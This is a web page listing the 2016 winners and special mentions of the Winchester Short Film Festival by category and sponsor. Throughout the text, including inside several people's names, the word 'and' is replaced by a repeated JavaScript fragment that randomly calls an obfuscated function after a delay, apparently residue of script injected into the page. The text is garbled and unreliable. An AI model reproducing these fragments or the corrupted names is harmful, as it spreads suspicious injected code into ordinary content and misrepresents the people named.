2016 Winners

We are delighted to announce the winners of the 2016 edition of the Winchester Short Film Festival short film competition. You can also read the list of the 2016 shortlisted films andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and the 2016 longlisted films.

We are very grateful once again to our sponsors, partners, andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and friends of the festival, without whom none of it would be possible. We are also thankful to our judges, who devote their time andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and expertise in selecting the winning films each year.

Best British Short Film

Sponsored by Dutton Gregory Solicitors

Winner: Andy Toovey for Only Child

Special Mentions
Matt Chambers for Daddy My
Christian Cooke for Edith
Alexandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ander Thomas for Beverley

Best Foreign Short Film

Sponsored by SMUG magazine

Winner: Gonzaga Manso for Eden Hostel

Special Mentions
Julian Quintanilla for The Whole World
Aleksandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andra Terspinska for America
Cyrus Neshved for Fils
Payal Sethi for Leeches

Best Comedy Short Film

Sponsored by Peter Lydon

Winner: Matty Groves for Jewels

Special Mention
Ruth Pickett for One Under

Best Non-Fiction Short Film

Sponsored by the University of Winchester

Winner: Joe Skillington for Forefathers

Special Mention
Caleb Yule for Turning 18

Best Animated Short Film

Sponsored by Winchester School of Art

Winner: Liam Harris for Perched

Special Mention
Jonathan Brooks for Ghostboy

Best Budget Short Film

Sponsored by London Camera Exchange

Winner: Max Blustin for A Magician

Special Mentions
Phil Peel for Late Request
Scott Castles & Chevy Mclaren for Drop Out

The Hampshire Prize

Sponsored by Winchester Today andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and Good Guys Productions

Winner: Ben Mitchell for RETCON

Special Mention

Gary Roberts for The Problemless Anonymous

Best Director Under 18

Sponsored by The Hampshire Picture Co

Winner: Noah Ottersen Parker for The Explorer

Special Mention

Joseph Johnson for Something Blue

MMBF Rising Star Award

Winner: Theo Pavlou for Hugo

Special Mention

Junaid Faiz for New World